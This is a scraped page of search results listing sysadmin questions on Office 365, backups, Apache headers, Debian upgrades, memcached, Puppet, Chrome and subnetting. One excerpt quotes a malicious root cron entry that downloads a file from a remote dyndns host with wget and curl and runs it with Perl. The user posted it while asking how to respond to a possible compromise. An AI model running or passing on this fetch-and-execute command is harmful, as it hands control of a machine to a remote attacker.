Search Results

Search found 10384 results on 416 pages for 'plan cache'.

Page 225 of 416

  • Office 365 E3 with Exchange Hosted Encryption (EHE)

    - by Stephen
    I hope this is the right forum for posting this question. I have a client who wants to move to Office 365. They are currently running on a trial of the Office 365 E3 plan. My staff are now also using Office 365 E3 via the internal-use licences provided as part of the MS Cloud Partner benefits. We've searched high and low, and spoken to about 15 different people at Office 365 Support as well as my local distributor's MS Product Manager, but we cannot seem to find out exactly how to purchase/subscribe to the Exchange Hosted Encryption (EHE) service, or how to configure/use it from Office 365. Does anybody out there have any insight into how we can set up and use the EHE service? Thanks! Stephen

    Read the article

  • Is it reasonable to use my Time Machine backup to migrate to a new primary hard drive?

    - by Michael Haren
    I'm planning to upgrade my MacBook's hard drive. I already use Time Machine to back up the system to an external drive. Is it reasonable to use Time Machine to restore my system to the new laptop drive, once I install it? I mean, a restore like this really ought to be fine, right? That's the point of it, after all! I know imaging the drive would be more appropriate, but this plan seems a whole lot easier (albeit probably slower), with practically no risk since my original drive won't be involved. A second question would then be: are there any considerations to be made when doing a Time Machine restore?

    Read the article

  • How can I remove HTTP headers with .htaccess in Apache?

    - by Daniel Magliola
    I have a website that is sending out "Cache-Control" and "Pragma" HTTP headers for PHP requests. I'm not doing that in the code, so I'm assuming it's some kind of Apache configuration, as suggested by this question (you don't really need to go there for this question's context). I don't have anything in my .htaccess files, so it has to be in Apache's configuration itself, but I can't access that; this is shared hosting and I only have FTP access to my website's directory. Is there any way I can add directives to my .htaccess files that will remove the headers added by the global configuration, or otherwise override the directive so that they're not added in the first place? Thank you very much, Daniel
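
    Assuming the host has mod_headers enabled (common on shared hosting, but not guaranteed), a per-directory override like this sketch can strip headers that the global configuration or PHP added:

      <IfModule mod_headers.c>
          Header unset Pragma
          Header unset Cache-Control
      </IfModule>

    If the headers survive, they may be added late in the response cycle; on newer Apache versions "Header always unset" targets that second header table.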

    Read the article

  • reaching 99.9999% uptime

    - by user35204
    I am currently developing a project which is mission-critical. The actual domain name is registered with 1&1, and I plan on purchasing the DynDNS Custom DNS service (which has 5 different geographical locations for DNS) and then another secondary DNS service to make sure my DNS is as failover-safe as possible. Does it matter that the registration is with 1&1 - are they a weak link in the chain? All I really use them for is to say that DynDNS is my primary DNS nameserver and then my secondary DNS is my other nameserver. I can transfer the registration to DynDNS - I'm just not sure if it really matters or not. Thanks
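
    Once both providers' nameservers are entered at the registrar, the delegation can be checked from the shell; the domain and server names below are placeholders:

      dig NS example.com +short                              # what the parent zone delegates to
      dig @ns1.provider.example example.com SOA +norecurse   # does each listed server answer authoritatively?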

    Read the article

  • Suspect cron job on CentOS 6.5 + Virtualmin, recommended course of action?

    - by sr_1436048
    I was doing some routine maintenance on my server and noticed a new cron job. It is set to run every 5 minutes as root:

      cd /tmp;wget http://eventuallydown.dyndns.biz/abc.txt;curl -O http://eventuallydown.dyndns.biz/abc.txt;perl abc.txt;rm -f abc*

    I've tried to download the file, but there is nothing to download. The server is running normally and there are no strange signs that the box has been compromised other than this entry. The only thing I can think of is that I recently installed Varnish Cache following this tutorial. Given that I did not create this cron job and nothing else appears to be wrong, what would be the appropriate course of action beyond disabling it?
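
    A root cron job that downloads and executes remote Perl every five minutes is a classic compromise marker, so the conservative answer is to treat the box as untrusted and rebuild from known-good media. For triage before making that call, something like the following (standard tools, nothing specific to this box) can show what else may have changed:

      # list root's crontab and the other common persistence points
      crontab -l -u root
      ls -la /etc/cron.d /etc/cron.hourly /var/spool/cron
      # look for recently modified files and unexpected listening services
      find /etc /usr/local -type f -mtime -7
      netstat -tulpn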

    Read the article

  • Problem upgrading the kernel on Debian 3.1

    - by exhuma
    Hi, I have quite an old box in a remote server farm, so I have no direct access, only remote SSH (and, via SSH, a serial console). I haven't updated this box in ages. Now, whenever I want to install a new package, a dependency on glibc appears. Unfortunately, the install of glibc depends on a 2.6 kernel and I am running a venerable 2.4 kernel (one more reason to upgrade). The problem is that the install of a new kernel has an indirect dependency (via locales) on glibc. So, to install glibc, I need a new kernel, and for a new kernel, I need to upgrade glibc. Essentially I am blocked. What's the best way to proceed considering I have no "hardware" access? Here's a quick transcript of the upgrade process:

      [green:~]% sudo aptitude install linux-image-686
      Reading Package Lists... Done
      Building Dependency Tree
      Reading extended state information
      Initializing package states... Done
      Reading task descriptions... Done
      The following packages are unused and will be REMOVED:
        gcc-4.3-base
      The following NEW packages will be automatically installed:
        dash libc6-i686 libparse-recdescent-perl linux-image-2.6-686
        linux-image-2.6.18-6-686 module-init-tools yaird
      The following packages have been kept back:
        adduser apache2 apache2-mpm-prefork apache2-utils apache2.2-common apt
        apt-utils aptitude autoconf autotools-dev awstats base-files base-passwd
        [...snip...]
        util-linux vacation vim vim-common wamerican wbritish wget whiptail whois
        wwwconfig-common zlib1g
      The following NEW packages will be installed:
        dash libc6-i686 libparse-recdescent-perl linux-image-2.6-686
        linux-image-2.6.18-6-686 linux-image-686 module-init-tools yaird
      The following packages will be upgraded:
        hotplug libc6
      2 packages upgraded, 8 newly installed, 1 to remove and 277 not upgraded.
      Need to get 0B/22.7MB of archives. After unpacking 52.1MB will be used.
      Do you want to continue? [Y/n/?]
      Writing extended state information... Done
      Preconfiguring packages ...
      (Reading database ... 34065 files and directories currently installed.)
      Preparing to replace libc6 2.3.6.ds1-13 (using .../libc6_2.7-18lenny2_i386.deb) ...
      Checking for services that may need to be restarted...
      Checking init scripts...
      WARNING: init script for postgresql not found.

      [ --- libc6 config screen appears here --- ]

      WARNING: POSIX threads library NPTL requires kernel version 2.6.8 or later.
      If you use a kernel 2.4, please upgrade it before installing glibc.
      The installation of a 2.6 kernel _could_ ask you to install a new libc first,
      this is NOT a bug, and should *NOT* be reported. In that case, please add
      etch sources to your /etc/apt/sources.list and run:
        apt-get install -t etch linux-image-2.6
      Then reboot into this new kernel, and proceed with your upgrade
      dpkg: error processing /var/cache/apt/archives/libc6_2.7-18lenny2_i386.deb (--unpack):
       subprocess pre-installation script returned error exit status 1
      Errors were encountered while processing:
       /var/cache/apt/archives/libc6_2.7-18lenny2_i386.deb
      E: Sub-process /usr/bin/dpkg returned an error code (1)
      Ack! Something bad happened while installing packages. Trying to recover:
      dpkg: dependency problems prevent configuration of locales:
       locales depends on glibc-2.7-1; however:
        Package glibc-2.7-1 is not installed.
      dpkg: error processing locales (--configure):
       dependency problems - leaving unconfigured
      Errors were encountered while processing:
       locales
      Reading Package Lists... Done
      Building Dependency Tree
      Reading extended state information
      Initializing package states... Done
      Reading task descriptions... Done

    Now, if I follow the instructions as prompted I get the following. Note that I am using aptitude instead of apt-get to benefit from the better dependency tracking; I did try with apt-get first, but that led me to the same problem.

      [green:~]% sudo aptitude install -t etch linux-image-2.6.26-2-686
      Reading Package Lists... Done
      Building Dependency Tree
      Reading extended state information
      Initializing package states... Done
      Reading task descriptions... Done
      E: Unable to correct problems, you have held broken packages.
      E: Unable to correct dependencies, some packages cannot be installed
      E: Unable to resolve some dependencies!
      Some packages had unmet dependencies. This may mean that you have requested
      an impossible situation or if you are using the unstable distribution that
      some required packages have not yet been created or been moved out of Incoming.
      The following packages have unmet dependencies:
        linux-image-2.6.26-2-686: Depends: initramfs-tools (>= 0.55) but it is not installable or
                                           yaird (>= 0.0.13) but it is not installable or
                                           linux-initramfs-tool which is a virtual package.

    Any ideas?
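
    One escape hatch people use for this kind of chicken-and-egg loop is to fetch the needed .debs by hand and let dpkg install them in an order apt cannot compute itself. A rough sketch, with the package URLs as placeholders (the real filenames have to be looked up under archive.debian.org/debian/pool, and this assumes yaird's own dependencies are already satisfiable):

      cd /tmp
      # placeholder URLs -- substitute the actual etch package files
      wget http://archive.debian.org/debian/pool/main/y/yaird/yaird_VERSION_i386.deb
      wget http://archive.debian.org/debian/pool/main/l/linux-2.6/linux-image-2.6.18-6-686_VERSION_i386.deb
      dpkg -i yaird_VERSION_i386.deb
      dpkg -i linux-image-2.6.18-6-686_VERSION_i386.deb
      # reboot into the 2.6 kernel, then retry the libc6/locales upgrade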

    Read the article

  • How to consolidate servers with not-very-strong infrastructure

    - by Sim
    All,

    Situation:
    - We are in the retail industry with about 10 distributors and use Solomon as the standard ERP for all our systems.
    - Each distributor has 1 HQ and 5-10 branches; each branch has its own server (Windows 2000/XP/2003 + Solomon + another built-in POS system).
    - Every day, branches have to extract data and send it (via email/Skype) to HQ for data consolidation purposes.
    - When we first deployed our ERP, the infrastructure (e.g. Internet connection) wasn't reliable enough. That's why we went with the decentralized model (each branch got its own server).
    - Now the infrastructure is mature, and we need to consolidate data more quickly (not branches - HQ - our company, but something like HQ - our company only).

    Goal:
    - We have Solomon servers only in each distributor's HQ. All the transactions in branches (retrieved from POS) will be synchronized with the HQ server directly.
    - There is a backup plan just in case the Internet goes down, or the HQ server goes down.

    Question: With the above, could you suggest a model for us? Should we use Terminal Services, or any other solutions? Any watch-outs/suggestions? Any good articles to read about this? Thanks a lot

    Read the article

  • Can't seem to disable Java Automatic Update

    - by sbussinger
    I'm just tweaking my new Windows 7 laptop and wanted to disable the automatic Java updating (and thus kill the silly jusched.exe background process), but I can't seem to get it to actually turn off. I found the Java Control Panel applet and the settings on the Update tab that should control it. I can turn them off, apply them, and close the dialog successfully. But if I open the dialog back up again right away, I see that the changes weren't actually made. I've tried numerous times and it just doesn't take. What's up with that? I also tried to disable the icon in the system tray and got the same effect. Changing the size of the Temporary Internet Files cache works, however. Any ideas? Thanks!
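
    On Windows 7 the updater settings live under HKLM, so the Java control panel silently fails to save them unless it runs elevated. Two options, the second assuming 32-bit Java on 64-bit Windows (drop Wow6432Node otherwise): right-click the Java control panel and choose "Run as administrator", or set the policy value directly from an elevated prompt:

      reg add "HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Update\Policy" /v EnableJavaUpdate /t REG_DWORD /d 0 /f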

    Read the article

  • Chrome: Black Screen of Death

    - by davidsinjaya
    I don't know when it started to happen. The screen turns completely black when a page includes JavaScript (I think). I cannot open YouTube videos, but I can still see the source code, use the pointer to find links and buttons, and hear the sound of the video. I have tried clearing my cache and reinstalling the latest version, but nothing seems to work. Moreover, I have disabled the PepperFlash player as well, but it did not help. This is my Chrome version:

      Google Chrome  22.0.1229.79 (Official Build 158531)
      OS             Windows
      WebKit         537.4 (@129177)
      JavaScript     V8 3.12.19.11
      Flash          11.3.31.331

    Please help.
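
    Black rendering with working audio often points at GPU-accelerated compositing rather than JavaScript itself. A quick test is to launch Chrome with acceleration off (flag appended to the shortcut target on Windows; both flags existed in this Chrome generation):

      chrome.exe --disable-gpu
      chrome.exe --disable-accelerated-compositing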

    Read the article

  • Facebook doesn't work on my computer but works on my mobile device; both use the same router

    - by sasa
    I have a very strange problem; I think it could be a problem with DNS or something similar, but I'm not sure and don't know how to solve it. My computer is connected to a router and every site works fine except Facebook (Chrome and Firefox). Chrome shows "Error 101 (net::ERR_CONNECTION_RESET): The connection was reset." But on a mobile device connected to the same router, Facebook works fine (the Fb application and the Dolphin browser). Pinging facebook.com works fine. Clearing cookies and cache didn't help. I also performed antivirus and antimalware scans and there is nothing. What can the problem be? Update: I also connected a notebook to that wifi router, and on it Facebook works fine.

      nslookup facebook.com
      Server:   UnKnown
      Address:  192.168.1.1

      Non-authoritative answer:
      Name:      facebook.com
      Addresses: 2a03:2880:2110:3f01:face:b00c::
                 2a03:2880:10:1f02:face:b00c:0:25
                 2a03:2880:10:8f01:face:b00c:0:25
                 69.171.224.37
                 69.171.229.11
                 69.171.242.11
                 66.220.149.11
                 66.220.158.11
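
    Worth noting: the nslookup answer starts with IPv6 addresses. If the desktop prefers IPv6 but the router cannot actually route it, facebook.com would fail with resets while IPv4-only sites keep working, and devices that prefer IPv4 would be fine. Assuming curl is available, the two paths can be compared directly:

      curl -4 -I http://www.facebook.com/   # force IPv4
      curl -6 -I http://www.facebook.com/   # force IPv6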

    Read the article

  • Multi-Application Server Environment and Memcached Security

    - by jocull
    We are looking to integrate memcached into our infrastructure, but have a security concern before we do. We run several platforms including ASP.NET and ColdFusion and have many app developers working on many little applications across the different platforms. The concern is this: App A places item "dog" into cache; App B reads item "dog" (or worse: App B updates item "dog"). After this happens, App A either retrieves bad information, or has already had its information viewed, aka "stolen". What we would like to do is make it so that each app can only interact with its own sandbox, and may not interfere with or read other applications' data. Is this possible? Thanks.
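
    For what it's worth, classic memcached has no users or namespaces at all, so isolation is usually done at the deployment layer: one instance per application, each on its own port, bound to an interface reachable only by that app's servers (newer builds also offer SASL authentication). A sketch, with the ports and bind address as examples:

      # one instance per app; -m is the memory cap in MB
      memcached -d -m 64 -p 11211 -l 10.0.0.5   # App A only
      memcached -d -m 64 -p 11212 -l 10.0.0.5   # App B only

    Key prefixing inside a shared instance hides data only by convention; it does not stop a misbehaving app from reading or overwriting another app's keys.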

    Read the article

  • Zero-channel RAID for High Performance MySQL Server (IBM ServeRAID 8k) : Any Experience/Recommendation?

    - by prs563
    We are getting this IBM rack-mount server, and it has the IBM ServeRAID 8k storage controller with zero-channel RAID and 256MB of battery-backed cache. It can support RAID 10, which we need for our high-performance MySQL server, which will have 4 x 15K RPM 300GB SAS HDDs. This is mission-critical and we want as much bandwidth and performance as possible. Is this a good card, or should we replace it with another IBM RAID card? The IBM ServeRAID 8k SAS Controller option provides 256 MB of battery-backed 533 MHz DDR2 standard power memory in a fixed mounting arrangement. The device attaches directly to the IBM planar, which can provide full RAID capability.

      Manufacturer:          IBM
      Manufacturer Part #:   25R8064
      Cost Central Item #:   10025907
      Product Description:   IBM ServeRAID 8k SAS - Storage controller (zero-channel RAID) - RAID 0, 1, 5, 6, 10, 1E
      Device Type:           Storage controller (zero-channel RAID) - plug-in module
      Buffer Size:           256 MB
      Supported Devices:     Disk array (RAID)
      Max Storage Devices:   8
      RAID Level:            RAID 0, RAID 1, RAID 5, RAID 6, RAID 10, RAID 1E
      Manufacturer Warranty: 1 year

    Read the article

  • How to Launch Spotlight from the Terminal

    - by Jack7890
    I used this tip to hide my menu bar in a bunch of applications, which is a great way to get more free screen space. The one downside is that (for inexplicable reasons) it disables Spotlight when I'm in those applications - e.g. even if I hover over the menu bar to make it appear, clicking on the Spotlight icon does nothing. I have a plan to work around this: I'd like to launch Spotlight using QuicKeys, which lets you run terminal commands using keyboard shortcuts. But to do that, I need to know how to launch Spotlight with a terminal command. Does anyone know how to do this? I'm on OS X 10.6.
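
    Spotlight has no documented command-line launcher, but its keyboard shortcut can be synthesized via AppleScript, which does work as a one-line terminal command (System Events may need accessibility access enabled):

      osascript -e 'tell application "System Events" to keystroke space using {command down}'

    If the goal is just searching, mdfind queries the same Spotlight index directly from the shell, e.g. mdfind budget.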

    Read the article

  • dependency hell

    - by Delirium tremens
    I'm trying to install Empathy. The current version has to be installed from source, but needs a list of things that have to be installed one by one. The previous version is in the repository, but blinks (opens, then right after that, closes). For the version before that:

    - apt-cache search -showpkg empathy shows general empathy information and a telepathy package too, but not the rpm file name
    - taking the rpm file name from a Google search result, apt-get install package=empathy-2.30.1-2pclos2010 says package package (twice, really) not found
    - after installing apturl and clicking the rpm file link, opening it with apturl, the installation GUI starts, but fails
    - opening the rpm file with Synaptic doesn't work
    - opening the rpm file with /usr/bin/apt-get doesn't work

    What now?
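
    One thing worth ruling out first: apt expects the package name before the equals sign and just the version after it, which would explain the literal "package package not found" message. A sketch (the version string must match one apt actually knows about; PCLinuxOS's apt-rpm uses the same syntax):

      apt-cache policy empathy                  # list the candidate versions
      apt-get install empathy=2.30.1-2pclos2010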

    Read the article

  • Puppet master/agent basic setup

    - by lewap
    I'm trying to set up a basic puppet agent/master use case with an agent server and a master. I've set up two servers with puppet and puppet master respectively. After the following setup of both servers:

      puppet master --no-daemonize --verbose
      puppet agent --test
      puppet cert --list    (to get the list)
      puppet cert --sign    (to sign it)
      puppet agent --test

    I get the message:

      err: Could not retrieve catalog from remote server: hostname was not match with the server certificate
      warning: Not using cache on failed catalog
      err: Could not retrieve catalog; skipping run
      err: Could not send report: hostname was not match with the server certificate

    What do I need to do in order to get the agent/master to be able to talk to each other?
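
    That error means the name the agent used to contact the master is not among the names in the master's certificate. Two common fixes, sketched with assumed hostnames: point the agent at the exact certname the master's certificate carries, or regenerate the master's certificate with the extra names listed:

      # on the agent (or set server= in puppet.conf); the name must match the master cert's CN
      puppet agent --test --server puppetmaster.example.com

      # or on the master: add to the [master] section of puppet.conf, remove the old
      # ssl directory, and restart so a cert with these alt names is generated
      # dns_alt_names = puppet,puppetmaster.example.com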

    Read the article

  • supervisord failed to start nagiosapi after reboot, need to run reload manually

    - by Bajingan Keparat
    I have supervisord start nagios-api every time the server starts. The API reads a status dump file called status.dat, which is updated periodically. The following is the conf section that starts the API:

      [program:nagapi]
      directory = /home/nagapi
      user = api
      command = /bin/bash -c "source /home/nagapi/.virtualenvs/nagapi/bin/activate; /home/nagapi/nagios-api/nagios-api"
      stdout_logfile = /home/nagapi/supervisor_nagios-api_stdout.log
      stderr_logfile = /home/nagapi/supervisor_nagios-api_stderr.log

    Every time I restart the server, supervisord cannot start the API. The stderr log claims that it cannot find the status.dat file located in /var/cache/nagios3. It seems the file has not yet been created when supervisor tries to run the API the first time; I'm saying this because if I do a supervisorctl reload, everything reloads just fine, and the API runs OK about 50 seconds after the reload command completes. Should I change the command option of the conf file to check for the status.dat file before starting the API?
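
    A simple approach along those lines is to have the wrapped shell command wait for the file before starting the API; a sketch using the same paths as the conf above (supervisord's startsecs/startretries options are a cruder, retry-based alternative):

      command = /bin/bash -c "while [ ! -f /var/cache/nagios3/status.dat ]; do sleep 5; done; source /home/nagapi/.virtualenvs/nagapi/bin/activate; /home/nagapi/nagios-api/nagios-api"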

    Read the article

  • Are periodic full backups really necessary on an incremental backup setup?

    - by user2229980
    I intend to use an old computer I have as a remote backup server for myself and a few other people. We are all geographically separated, and the plan is to do incremental daily backups using rsync and ssh. My original idea was to make one initial full backup and then never again deal with the overhead of doing one, copying only the files changed since the last backup from that moment on. I've been told that this could be bad, but I fail to understand why. Since each snapshot is comprised of hard links to the unchanged files plus the original changed ones, isn't it going to be identical to a new full backup? Why would I want to make another full backup?
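
    For reference, this is the hard-link snapshot pattern in question: each new snapshot directory is populated with hard links to the previous copy for unchanged files, so it reads like a full backup while costing only the changed files. A sketch with hypothetical paths:

      rsync -a --delete \
            --link-dest=/backups/host1/2013-06-01 \
            user@host1:/home/ /backups/host1/2013-06-02/

    The usual argument for an occasional fresh full copy is that it bounds the damage from silent corruption or an rsync mishap propagating through the entire link chain.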

    Read the article

  • Error while adding a web service to a server in WebsitePanel

    - by sam
    I got the following error while creating a website for a user in WebsitePanel. I am not able to create any hosting space in the server's hosting plan; it is showing 0 MB of space.

      Stack Trace:

      [SoapException: System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.UriFormatException: Invalid URI: The Authority/Host could not be parsed.
         at System.Uri.CreateThis(String uri, Boolean dontEscape, UriKind uriKind)
         at System.Uri..ctor(String uriString)
         at Microsoft.Web.Services3.WebServicesClientProtocol.set_Url(String value)
         at WebsitePanel.Server.Client.ServerProxyConfigurator.Configure(WebServicesClientProtocol proxy)
         at WebsitePanel.EnterpriseServer.ServiceProviderProxy.ServerInit(WebServicesClientProtocol proxy, ServerProxyConfigurator cnfg, String serverUrl, String serverPassword)
         at WebsitePanel.EnterpriseServer.ServiceProviderProxy.ServerInit(WebServicesClientProtocol proxy, ServerProxyConfigurator cnfg, Int32 serverId)
         at WebsitePanel.EnterpriseServer.ServiceProviderProxy.Init(WebServicesClientProtocol proxy, Int32 serviceId)
         at WebsitePanel.EnterpriseServer.WebAppGalleryController.InitFeedsByServiceId(Int32 UserId, Int32 serviceId)
         at WebsitePanel.EnterpriseServer.esWebApplicationGallery.GetGalleryApplicationsByServiceId(Int32 serviceId)
         --- End of inner exception stack trace ---]
      System.Web.Services.Protocols.SoapHttpClientProtocol.ReadResponse(SoapClientMessage message, WebResponse response, Stream responseStream, Boolean asyncCall) +1485877
      System.Web.Services.Protocols.SoapHttpClientProtocol.Invoke(String methodName, Object[] parameters) +221
      WebsitePanel.EnterpriseServer.esWebApplicationGallery.GetGalleryApplicationsByServiceId(Int32 serviceId) +68
      WebsitePanel.Portal.WebAppGalleryHelpers.GetGalleryApplicationsByServiceId(Int32 serviceId) +31

    Can anybody help me with this?

    Read the article

  • Puppet apache module causing 'Error 400 on SERVER: Invalid parameter identifier'

    - by Andy Shinn
    I am receiving the following error when trying to use the latest puppetlabs-apache module from GitHub (https://github.com/puppetlabs/puppetlabs-apache):

      Error: Could not retrieve catalog from remote server: Error 400 on SERVER: Invalid parameter identifier at /etc/puppet/environments/apache_update/modules/apache/manifests/mod.pp:40 on node zordon.mydomain.com
      Warning: Not using cache on failed catalog
      Error: Could not retrieve catalog; skipping run

    My node config looks like:

      node 'zordon.mydomain.com' {
        include template::common
        include template::puppetagent
        include template::lamp
        User::Create <| |>
        sudo::conf { 'joe':
          priority => 60,
          content  => 'joe ALL=(ALL) NOPASSWD: ALL',
          require  => User::Create['joe'],
        }
      }

    The template::lamp class is what uses the apache module:

      class template::lamp {
        include myfirewall
        Firewall <| |>
        Firewall <| |>
        class { 'apache': }
        class { 'apache::mod::php': }
        class { 'apache::mod::ssl': }
        class { 'mysql::server': }
      }

    It looks like Server Fault markup garbled the Puppet realize statements; the User::Create and Firewall lines are just realizing a user and 2 firewall rules. I have verified that the /var/lib/puppet/lib/puppet/type/a2mod.rb type has the identifier parameter and it is the same MD5 as the server's. I am using Puppet 3.0.1 on both agent and master. Any idea what may cause this?
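
    An Error 400 "Invalid parameter" against a parameter that demonstrably exists is often a stale plugin-sync artifact. Clearing the agent's synced lib directory and letting pluginsync repopulate it is a cheap first test (path taken from the question):

      rm -rf /var/lib/puppet/lib/*
      puppet agent --test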

    Read the article

  • Understanding top output in Linux

    - by Rayne
    Hi, I'm trying to determine the CPU usage of a program by looking at the output from top in Linux. I understand that %us means userspace and %sy means system/kernel, etc. But say I see 100%us: does this mean that the CPU is really only doing useful work? What if the CPU is tied up waiting for resources that are not available, or on cache misses? Would that also show up in the %us column, or in any other column? Thank you.
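
    For reference, an annotated CPU line from top (the values are invented): a process stalling on cache misses is still executing instructions and is charged to %us, a process blocked on disk I/O is charged to %wa, and one sleeping on an unavailable lock or resource contributes to %id:

      Cpu(s): 97.0%us, 1.0%sy, 0.0%ni, 1.0%id, 1.0%wa, 0.0%hi, 0.0%si, 0.0%st
      # us=user, sy=kernel, ni=niced user, id=idle, wa=I/O wait,
      # hi/si=hardware/software interrupts, st=time stolen by the hypervisor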

    Read the article

  • Getting error 2048 at whatever I'm doing in Eclipse

    - by Bernhard V
    Hi, whatever I do in Eclipse, I get an error. At startup I get an error during Java tooling initialization. I get an error when I want to open a type. And it's always the same error. For example, when opening a type I get:

      An internal error occurred during: "Cache refresh".
      2048

    The error at startup also prints the error code 2048. I'm using the most up-to-date version of Eclipse. Do you know a way to fix this issue?
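
    A common first step for persistent "Cache refresh" errors is to flush Eclipse's cached state, on the assumption that the on-disk caches are corrupt: start once with -clean, and if that doesn't help, remove the JDT index with the workspace closed (the workspace path is a placeholder):

      eclipse -clean
      rm -rf <workspace>/.metadata/.plugins/org.eclipse.jdt.core   # JDT index cache, rebuilt on next start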

    Read the article

  • My HP-Vista based laptop has become very slow recently

    - by goldenmean
    My HP laptop runs Vista Home Premium. When I try to start Firefox or Internet Explorer, it becomes very slow; no other app is affected. When I checked Performance in Task Manager, it shows Physical Memory Free as 0 bytes almost always. This started recently; earlier it didn't use to be zero. The laptop has 2GB of RAM. I have nothing running in my tray except the sound control, the laptop power plan indicator, and the network status indicator. There are no other processes whose memory usage adds up so high as to make free memory zero. So what could be hogging the memory and making the laptop very slow? Any pointers would help, as it is crawling at the moment.

    Read the article

  • AWS RDS Timeout

    - by warder57
    I know next to nothing about networking/servers, so I'm assuming I'm missing something obvious. All of the resources I can find on this either don't work or are outdated. I created a brand new AWS account on the free plan. I created a Postgres RDS DB instance. I made sure that this RDS instance is set to publicly accessible. This RDS instance has the default VPC/security group settings. In order to connect to this DB from my local machine, I used pgAdmin3 and followed the instructions provided in the AWS documentation, seen here: http://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ConnectToPostgreSQLInstance.html. I've double-checked all of the information required to connect:

      Host:     whatever.whatever.us-west-2.rds.amazonaws.com
      Port:     5432
      Username: USERNAME
      Password: PASSWORD

    When I try to connect to the database, my connection fails due to a timeout (during step 4 in the above guide). Can anyone point me to whatever I am missing? Thanks in advance
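
    One detail that commonly causes exactly this timeout: "publicly accessible" only gives the instance a public address; the VPC security group attached to it must also allow inbound TCP 5432 from your IP, and the default group does not. A hedged CLI example, with the group ID and client IP as placeholders:

      aws ec2 authorize-security-group-ingress \
          --group-id sg-0123456789abcdef0 \
          --protocol tcp --port 5432 \
          --cidr 203.0.113.7/32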

    Read the article

  • Faster (Squid + Apache httpd + Apache Tomcat)

    - by letronje
    We have a production setup with Squid in front (caching images, JS, CSS, etc.), Apache httpd in the middle (prefork + mod_rewrite + mod_jk/AJP + mod_deflate + mod_php for a few PHP pages), and Apache Tomcat 5.5 at the end serving all the dynamic stuff. What would be the best way to reduce the overhead of having 3 servers in the request path? I wonder if replacing httpd with a faster web server like nginx/lighttpd would help. httpd right now does the job of URL rewriting (for clean URLs), talking to Tomcat (via mod_jk), compressing output (mod_deflate), and serving some low-traffic PHP pages. What would be the ideal replacement for httpd given that we need these features? Is there a way to replace (Squid + Apache) with a single entity that caches static stuff well (like Squid), rewrites URLs, compresses responses, and forwards dynamic stuff directly to Tomcat? I've heard about Varnish Cache and wonder if it can help.
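
    As a sketch of the single-entity idea: nginx can cache static responses, rewrite URLs, gzip, and proxy to Tomcat over plain HTTP instead of AJP. The names and paths below are assumptions, and the cache declaration belongs in the http block:

      proxy_cache_path /var/cache/nginx levels=1:2 keys_zone=static:64m;
      server {
          listen 80;
          gzip on;                                    # replaces mod_deflate
          location ~* \.(png|jpg|gif|css|js)$ {
              proxy_cache static;                     # replaces Squid for static files
              proxy_pass http://127.0.0.1:8080;
          }
          location / {
              rewrite ^/old/(.*)$ /app/$1 last;       # replaces mod_rewrite
              proxy_pass http://127.0.0.1:8080;       # replaces mod_jk/AJP
          }
      }

    The few PHP pages would still need php-fpm behind nginx (or keeping httpd around just for those).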

    Read the article

  • Cisco, How to do a subnetting scheme using VLSM and RIP-2?

    - by Andrei T. Ursan
    I'm studying for my CCNA exam and I have to create a VLSM scheme using RIP-2 for the following requirements (this is an exercise):

    - Use the class C network 192.168.1.0 for your point-to-point connections.
    - Using the class A network 10.0.0.0, plan for the following number of hosts in each location: New York 1000, Chicago 500, Los Angeles 1000.
    - On the LAN and point-to-point connections, select subnet masks that use the smallest ranges of IP addresses possible given the above requirements.
    - In all cases, use the lowest possible subnet numbers. Subnet zero is allowed.

    My guess is the following:

      New York:    S0/0 192.168.1.1 /24   Fa0/0 10.1.0.1 netmask 255.255.248.0 (because we need 1000 hosts)
      Chicago:     S0/0 192.168.1.2 /24   Fa0/0 10.2.0.1 netmask 255.255.252.0 (for 500 hosts)
      Los Angeles: S0/0 192.168.2.3 /24   Fa0/0 10.3.0.1 netmask 255.255.248.0 (for 1000 hosts)

    Is this a good configuration? I'm reading the CCNA book but not everything is very clear, so I decided to do some exercises... Thank you!
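
    A quick sanity check of the masks, counting usable hosts as 2^(32 - prefix) - 2:

      /21 (255.255.248.0)   -> 2^11 - 2 = 2046 hosts
      /22 (255.255.252.0)   -> 2^10 - 2 = 1022 hosts  (smallest that fits 1000)
      /23 (255.255.254.0)   -> 2^9  - 2 =  510 hosts  (smallest that fits 500)
      /30 (255.255.255.252) -> 2^2  - 2 =    2 hosts  (enough for a point-to-point link)

    So under the "smallest ranges possible" rule, the 1000-host LANs want /22 rather than /21, the 500-host LAN wants /23 rather than /22, and each serial link only needs a /30 carved out of 192.168.1.0 instead of a full /24.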

    Read the article
